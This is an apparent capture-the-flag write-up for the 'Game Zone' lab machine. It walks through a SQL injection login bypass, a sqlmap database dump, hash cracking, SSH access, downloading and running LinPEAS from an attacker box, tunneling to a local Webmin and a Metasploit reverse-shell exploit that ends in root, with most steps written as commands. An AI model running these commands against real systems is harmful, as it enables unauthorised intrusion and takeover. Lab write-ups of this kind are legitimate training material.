Game Zone | Linux
Difficulty: Medium
Tags: SQLi, hash cracking, tunneling, Webmin, privesc
Tools Used: Nmap, Gobuster, Burp Suite, SQLMap, John the Ripper, LinPEAS, SSH, Metasploit

Game Zone isn’t just another web-to-root machine. It’s a blueprint for the kind of layered exploitation that dominates real-world engagements: weak login logic, password reuse, local services hiding behind SSH, and a final pop through Metasploit. This is a full-stack test of your OSCP fundamentals. 🧠

Initial Enumeration

Started with an aggressive scan to surface all useful detail:

nmap -sC -sV -A 10.10.238.97

Scan results came back with:

• Port 22 – SSH

• Port 80 – HTTP (Apache)

A web server means we probe further. Unleashed Gobuster to map the HTTP terrain:

gobuster dir --url http://10.10.238.97 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Found /index — a login page.

Exploiting SQL Injection

Tested basic SQL payloads in the form:

Username: admin0x27 OR 1=1 -- -
Password: anything

The response hinted at bypass. Captured the raw request with Burp Suite, then handed it to SQLMap:

sqlmap -r web_req.txt --dbms=mysql --dump

Hit /portal.php and dumped a password hash.

Cracking the Credentials

Used hashID to identify the hash type. Then cracked it with John the Ripper:

john crackme --wordlist=/usr/share/wordlists/rockyou.txt --format=<hash_format>

Result: cleartext credentials for SSH.

SSH login:

ssh user@10.10.238.97

Popped the user flag:

cat user.txt

Privilege Escalation with LinPEAS

Time to go deeper.

Uploaded linpeas.sh via a local Python server:

python3 -m http.server 5555   # attacker box
wget http://<attacker-ip>:5555/linpeas
chmod +x linpeas
./linpeas

LinPEAS flagged something interesting: a local-only service on port 10000.

Pivoting with SSH Tunneling

To access the internal service, we tunneled it over SSH:

ssh -L 10000:127.0.0.1:10000 user@10.10.238.97

Hit

http://127.0.0.1:10000

in the browser — Webmin login page.

Tried the previously cracked credentials — they worked. We were in.

Webmin Exploitation with Metasploit

Verified the Webmin version from the UI — 1.580. Looked up known vulns:

searchsploit webmin 1.580

Found:

Webmin 1.580 - '/file/show.cgi' Remote Command Execution

Loaded the matching Metasploit module:

msfconsole
search webmin_show_cgi_exec

Config:

set RHOST 127.0.0.1
set RPORT 10000
set USERNAME user
set PASSWORD password
set SSL false
set PAYLOAD cmd/unix/reverse
set LHOST tun1
set LPORT 4444
run

Callback hit. We had root.

whoami
root
cat /root/root.txt

Summary / Review

Game Zone teaches exploitation chaining at its best:

Initial Access:

• SQLi in login ➤ dumped password hash

• Cracked hash ➤ SSH creds

• SSH login ➤ user flag

Privilege Escalation Path:

• linpeas ➤ exposed localhost Webmin

• SSH tunneling ➤ Webmin access

• Metasploit RCE ➤ root shell

It’s a reminder that:

• Hashes in the wild are almost always worth cracking

• Exposed services inside the box can be just as dangerous as external ones 🛡️

• Reused credentials are a weapon

• Tunneling isn’t just a CTF trick — it’s real opsec 💣

Command Recap

nmap -sC -sV -A 10.10.238.97  
gobuster dir --url http://10.10.238.97 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  
sqlmap -r web_req.txt --dbms=mysql --dump  
john crackme --wordlist=/usr/share/wordlists/rockyou.txt --format=<hash_format>  
ssh user@10.10.238.97  
python3 -m http.server 5555  
wget http://<attacker-ip>:5555/linpeas && chmod +x linpeas && ./linpeas  
ssh -L 10000:127.0.0.1:10000 user@10.10.238.97  
msfconsole  
set payload cmd/unix/reverse  
set RHOST 127.0.0.1  
set RPORT 10000  
set LHOST tun1  
set LPORT 4444  
run

Final Thoughts

Weak auth logic. Reused creds. Exposed internal tools.
Game Zone rewards methodical attackers who know how to connect the dots.

Crack the hash, open the tunnel, light the shell.

Another one rooted. On to the next.